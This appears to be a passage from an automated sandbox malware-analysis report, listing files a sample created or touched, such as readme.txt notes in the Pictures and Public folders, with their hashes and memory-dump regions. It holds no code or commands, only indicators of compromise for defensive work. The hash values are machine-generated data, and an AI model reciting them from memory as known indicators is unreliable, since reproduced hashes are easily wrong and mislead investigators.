                                                                                                                                                                                                                                    b33df70485e1e0eba5c6c152e93c1e2a8195654d33658d024d0e3a59f10f43e006a485d55627cb1d10b2a060348bcb52e796dc70b811e93f5530bba0b7efd380

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1724488678

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    8f45d0fcc7cf039e454a5388ec8ed926

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    a688abd1027ff3b47efdbf1cf3544024b51da741

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    16a2819e9f1428a3de30b5b7d96434041cfa22fa2baba344f1dcd97e5503f773

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    839fa2455b9bedc1e24150f772622be2de8a3f8b8957a5f510de9d2f090dafd318922b095482ed52b1a7b60844524642577dd1508cdc29be4ba5e713153d5fb6

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133689622931915699.txt

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    75KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    ffed3745486b04f80e28f9b14df3cd4e

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    3930dfb5f0651db55c45784b563c5677b1f798a7

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    06323b45d1af9ecb1a095bad101d4c2ce1092a1649fa8f67ba33970d1b6cd174

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    446b90c1262388570aca8b8fefcf24c44b53a148c314d3ed871fabccd9d07c9c912f14fba5072c0ed17446099508c54f1bd364b54e2e448fb824a7e260fff324

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    5855ed09e6faa6dcbaa97435c6c89081

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    2c5e506096c6f1d9622a2233afdb3c1117da6ace

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    673cf01cdffe504bf290c2756ccab12d0ad51af6c7b237c6cd2e6160e2f0543a

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    feb25248bb8e78176be50054847a92a68aa6a2cb47c56645be30516e7f4146f90b91c5dcca1534544c4b9eb68865d0907d8e997b3273548a5c148fee0e83e88f

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    3KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    e7da29eac310e9b30ada3c23ba0104bd

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    2d723c92c12870f7e826d6c3786a9541d3df318f

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    ea52eb9e28fa93785f42a33208734fcce9797257671a168b54e69bd9dc6c09f9

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    f61785de7d88d23c218e70aef088ab462ae6eaf7715f8683bd84520ab2ea378e45de8920f50058f677c29d1757f524f679736e21175d84185952178e8ffb3ff4

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    155578d3cb2f3c2196284e552834d725

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    7699cf2817e4e45bc7f0cb132d3e7aef7012b0ea

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    24444ea8b4153a8923b78a04ee7a6ea98c3f7738acc065bd57b35b040ea4c9c8

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    d72e6ef6c974f4e37d87a5f50a714d21720a73492cf4d5ac34652a7d5ce6bdacfde9e752e444db1e5c82289a39cd3808481654d46b4da3f30bba1924ce3def2d

                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\readme.txt

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    e454d8366df89ac8ea9ee5b4ca636ae1

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    8405b75d223d0ff3aa2fb5361d7e1091a9fa27c2

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    8dd148ce6d579d4045ea8f01a38de543d85cb9a0bd76fde5e7b9c7f8ba983900

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    f57ef6c0875de16dd219e13a106a32a5ece300c1e4f09041047dfd914de28fa3564e8ac50be505d9f2ff05cc5a75d2e33d80943c34c261e8b550ba3cdb632441

                                                                                                                                                                                                                                  • C:\Users\Public\readme.txt

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    332B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    718777534403cdcf89b5d9b5f4b2f141

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

                                                                                                                                                                                                                                  • memory/2636-12-0x00000166EEBE0000-0x00000166EEBE5000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    20KB

                                                                                                                                                                                                                                  • memory/3804-557-0x0000023E46EC0000-0x0000023E46EC8000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/3804-472-0x0000023E46BE0000-0x0000023E46BE1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3804-471-0x0000023E46BF0000-0x0000023E46BF8000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/4060-6-0x000002A356750000-0x000002A356751000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-5-0x000002A356740000-0x000002A356741000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-0-0x000002A356370000-0x000002A35670B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    3.6MB

                                                                                                                                                                                                                                  • memory/4060-7-0x000002A356760000-0x000002A356761000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-8-0x000002A3567A0000-0x000002A3567A1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-9-0x000002A3567B0000-0x000002A3567B1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-10-0x000002A3567D0000-0x000002A3567D1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-11-0x000002A356890000-0x000002A356891000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-4-0x000002A356730000-0x000002A356731000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-3-0x000002A356720000-0x000002A356721000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-2-0x000002A356710000-0x000002A356711000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4060-1-0x000002A356260000-0x000002A356261000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB